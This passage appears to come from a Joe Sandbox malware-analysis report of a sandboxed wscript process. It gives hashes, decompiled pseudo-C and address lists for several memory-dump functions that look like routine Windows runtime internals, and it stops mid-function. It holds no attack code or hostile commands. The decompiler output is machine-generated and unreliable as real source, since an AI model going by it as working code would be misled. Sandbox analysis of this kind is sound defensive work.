Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e30bc334aea814ed4bd5e3f3afeb6322fba367e6d93438c60667b94f09f5f1
Instruction ID: eee43af443225ee7fca4a07fc503c5caecd87d20b98da6b1b2905e60236aead2
Opcode Fuzzy Hash: a1e30bc334aea814ed4bd5e3f3afeb6322fba367e6d93438c60667b94f09f5f1
Instruction Fuzzy Hash: 63317C71609705CFE760CF59CA04B66B7E9FB88B00F09496EE89597351E7B0E804CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0594AA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0594AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x5a3d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x5a37b9c; // 0x0
					_t53 = L05964620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0598B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0598F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L05956C59(_t53, _t51, _t58) != 0) {
							_t28 = E05975E50(0x592c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0597B230(_v32, _v28, 0x592c2d8, 1,  &_v24);
								_t28 = E0594F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0594aa25
0x0594aa29
0x0594aa2d
0x0594aa30
0x0594aa37
0x0594aa3c
0x059a4458
0x059a4458
0x059a4472
0x059a4474
0x059a4476
0x0594aa64
0x0594aa74
0x059a447c
0x059a4483
0x059a4492
0x0594aa52
0x0594aa54
0x0594aa5e
0x059a44a8
0x059a44ad
0x059a44af
0x059a44b6
0x059a44b6
0x059a44b9
0x059a44bc
0x059a44cd
0x059a44d3
0x059a44d6
0x059a44e1
0x059a44e1
0x059a44e6
0x059a44e8
0x059a44fb
0x059a44fb
0x059a44e8
0x00000000
0x0594aa5e
0x059a4476
0x0594aa42
0x0594aa46
0x0594aa48
0x0594aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c61d1ae597e8f90a1a27ecb167a339c16636c55899f9f44b6a448da51dcc3ef
Instruction ID: 3fe1edb3c21f7e34c08c3d8014414fc40a241d3b5a26980365f6a90f6a1f8464
Opcode Fuzzy Hash: 5c61d1ae597e8f90a1a27ecb167a339c16636c55899f9f44b6a448da51dcc3ef
Instruction Fuzzy Hash: 88318072A00219ABCF15AF64CD81ABFB7BAFF44700B05446AF905EB150EB74AD11DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05988EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E05988EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x5a3d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E05974E70(0x5a386e4, 0x5989490, 0, 0);
					if( *0x5a353e8 > 5 && E05988F33(0x5a353e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x5a353e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x5a353e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x592bc46;
						_t48 = E059C7B9C(0x5a353e8, 0x592bc46, _t67, 0x5a353e8, _t70,  &_v140);
					}
				}
				return E0598B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x05988ec7
0x05988ed9
0x05988edc
0x05988ee6
0x05988ee9
0x05988eee
0x05988efc
0x05988f08
0x059c1349
0x059c1353
0x059c135d
0x059c1366
0x059c136f
0x059c1375
0x059c137c
0x059c1385
0x059c1390
0x059c1391
0x059c139c
0x059c139d
0x059c13a6
0x059c13ac
0x059c13b2
0x059c13b5
0x059c13bc
0x059c13bf
0x059c13c2
0x059c13c5
0x059c13c8
0x059c13cb
0x059c13ce
0x059c13d1
0x059c13d4
0x059c13d7
0x059c13da
0x059c13dd
0x059c13e0
0x059c13e3
0x059c13e6
0x059c13e9
0x059c13f6
0x059c1400
0x059c1400
0x05988f08
0x05988f32

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0db8868b3a539109ba50fb3de0b3285b6bff92973d94957c78fd3e0d0571650
Instruction ID: d2030fda83f4da031e7bd103c3f16c651140ca2fe547f75b29864b5214e6c8d8
Opcode Fuzzy Hash: e0db8868b3a539109ba50fb3de0b3285b6bff92973d94957c78fd3e0d0571650
Instruction Fuzzy Hash: C241A2B1D003189FDB20DFAAD981AADFBF9FB48310F9041AEE519A7201D7706A44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 05984A2C Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E05984A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x5a3d360 ^ _t62;
				_v8 =  *0x5a3d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E05962280(_t26, 0x5a38608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0595FFB0(_t41, _t51, 0x5a38608);
						L2:
						 *0x5a3b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0598B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E05962280(_t28, 0x5a38608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0595FFB0(_t42, _t53, 0x5a38608);
							if(_t53 != 0) {
								L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0595FFB0(_t41, _t51, 0x5a38608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x05984a2c
0x05984a34
0x05984a3c
0x05984a3e
0x05984a48
0x05984a4b
0x05984a4d
0x05984a51
0x05984a9c
0x00000000
0x00000000
0x05984aa3
0x05984aa8
0x05984aad
0x05984ab1
0x05984ade
0x05984ae3
0x05984a5a
0x05984a62
0x05984a6a
0x05984a6e
0x059bf203
0x05984a84
0x05984a88
0x05984a89
0x05984a8a
0x05984a95
0x05984a95
0x05984a79
0x05984a80
0x05984af2
0x05984af4
0x05984af9
0x05984aff
0x05984b01
0x05984b03
0x05984b08
0x059bf20a
0x059bf212
0x059bf216
0x059bf216
0x05984b08
0x05984b13
0x05984b1a
0x059bf229
0x059bf229
0x05984b1a
0x05984a82
0x00000000
0x05984a82
0x05984ab7
0x05984acd
0x05984acd
0x05984ad5
0x05984ada
0x00000000
0x05984ada
0x05984ac2
0x05984acb
0x00000000
0x00000000
0x00000000
0x05984acb
0x05984a53
0x05984a53
0x05984a58
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f534e1e819c9414a041a3e6c42cf0513e108eb2bf4642d1816ed9ce3d16c0ec6
Instruction ID: 7095386715ab357a4366190cd795f91d4f11a404d27dfe4d1f6c7a22f7db229c
Opcode Fuzzy Hash: f534e1e819c9414a041a3e6c42cf0513e108eb2bf4642d1816ed9ce3d16c0ec6
Instruction Fuzzy Hash: 0131F63220A3529BDF21EF54C945B3AFBAAFFC0B18F454569F85A4B640C774E804CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0597E730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0597E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E05989670() < 0) {
					L0599DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x5a37b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L05964620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0597E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0597e730
0x0597e736
0x0597e738
0x0597e73d
0x0597e73e
0x0597e740
0x0597e749
0x0597e765
0x0597e76a
0x0597e76b
0x0597e76c
0x0597e76d
0x0597e76e
0x0597e76f
0x0597e775
0x0597e777
0x0597e77e
0x059bb675
0x0597e784
0x0597e784
0x0597e789
0x0597e7a8
0x0597e7ac
0x0597e807
0x0597e7ae
0x0597e7ae
0x0597e7b1
0x0597e7b4
0x0597e7b9
0x0597e7c0
0x0597e7c4
0x0597e7ca
0x0597e7cc
0x00000000
0x0597e7d3
0x0597e7d6
0x00000000
0x00000000
0x0597e7ff
0x0597e802
0x00000000
0x00000000
0x0597e7f9
0x0597e7fc
0x00000000
0x00000000
0x0597e7f3
0x0597e7f6
0x00000000
0x00000000
0x0597e7ed
0x0597e7f0
0x00000000
0x00000000
0x0597e7e7
0x0597e7ea
0x00000000
0x00000000
0x059bb685
0x059bb688
0x00000000
0x00000000
0x059bb682
0x00000000
0x00000000
0x0597e7cc
0x0597e7d9
0x0597e7dc
0x0597e7de
0x0597e7de
0x0597e7ac
0x0597e7e4
0x0597e74b
0x0597e751
0x0597e759
0x0597e761
0x0597e761

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c987d853b231e4703ac63d4e066cdf6426ca9361942847c5830bab10d3d65f
Instruction ID: fcd0865a407fb5af4bf076c912955c8e1418a233d83a8126b2c0b9a6ed011d20
Opcode Fuzzy Hash: 60c987d853b231e4703ac63d4e066cdf6426ca9361942847c5830bab10d3d65f
Instruction Fuzzy Hash: 04319F75A14249EFD744CF68D845F9ABBE8FB09314F1486AAF918CB341D631ED80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0597BC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0597BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x5a36100; // 0x49
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E05962280(0xd, 0x1c30f1a0);
				_t41 =  *0x5a360f8; // 0x0
				if(_t41 != 0) {
					 *0x5a360f8 =  *_t41;
					 *0x5a360fc =  *0x5a360fc + 0xffff;
				}
				E0595FFB0(_t41, 0x800, 0x1c30f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x5a360f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L05964620(0x5a36100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x5a36100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0597bc36
0x0597bc42
0x0597bc45
0x0597bc4a
0x0597bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0597bc50
0x0597bc50
0x0597bc58
0x0597bc5a
0x0597bc60
0x00000000
0x00000000
0x059ba4f2
0x059ba4f6
0x00000000
0x00000000
0x00000000
0x059ba4fc
0x0597bc79
0x0597bc7e
0x0597bc86
0x0597bd16
0x0597bd20
0x0597bd20
0x0597bc8d
0x0597bc94
0x0597bcbd
0x0597bcca
0x0597bccb
0x0597bccc
0x0597bccd
0x0597bcce
0x0597bcd4
0x0597bcea
0x0597bcee
0x0597bcf2
0x0597bd00
0x0597bd04
0x00000000
0x0597bc96
0x0597bcab
0x0597bcaf
0x0597bd2c
0x0597bd2c
0x0597bd09
0x00000000
0x0597bd09
0x0597bcb1
0x0597bcb5
0x0597bcbb
0x00000000
0x00000000
0x00000000
0x0597bcbb

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4efe76f2acd69a92e21c2e6fc588cfd935cfc86f3f729cd9cd2ae0870dd7e96f
Instruction ID: 8118f26f458706fd0fefe980454594d2c341539236820dbb712034b6062c4cc9
Opcode Fuzzy Hash: 4efe76f2acd69a92e21c2e6fc588cfd935cfc86f3f729cd9cd2ae0870dd7e96f
Instruction Fuzzy Hash: 8A31F172614619ABCB01DF58C8C1BAA77A6FB09314F048076FC09DB201FA78DA068B80

Uniqueness

Uniqueness Score: -1.00%

Function 05971DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E05971DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0596F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L05964620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0596F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x05971dc2
0x05971dc5
0x05971dc7
0x05971dcc
0x05971dce
0x05971dd6
0x05971ddf
0x05971de0
0x05971de1
0x05971de5
0x05971de8
0x05971def
0x05971df0
0x05971df6
0x05971df7
0x05971dfe
0x05971e1a
0x00000000
0x00000000
0x05971e0b
0x05971e12
0x05971e12
0x05971e00
0x05971e00
0x05971e05
0x05971e1e
0x05971e23
0x059b570f
0x059b5713
0x00000000
0x00000000
0x059b5719
0x059b5719
0x05971e2c
0x05971e2d
0x05971e2e
0x05971e2f
0x05971e31
0x05971e32
0x05971e35
0x05971e3d
0x059b5723
0x059b573d
0x059b573d
0x00000000
0x059b5723
0x05971e49
0x05971e4e
0x05971e4e
0x05971e09
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: f6e00ff93bddbaa6d6a939958a3fcf571ab25e5e0b084ac80ef235782a81f5f9
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: E421907260061DFFD721CF99CD84EABBBBDFF85640F254456E90597220D634AE01EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05949100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05949100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x5a1f6e8);
				E0599D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E05A188F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0599D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x5a386c0; // 0x2a707b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x5a386b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E05962280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E05A188F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0598AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x5a3b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x5a384c0;
										if(_t69 >=  *0x5a384c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E05A19063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0594922A(_t82);
							_t53 = E05967D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E05A18B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x5a386c0; // 0x2a707b0
								if(__eflags != 0) {
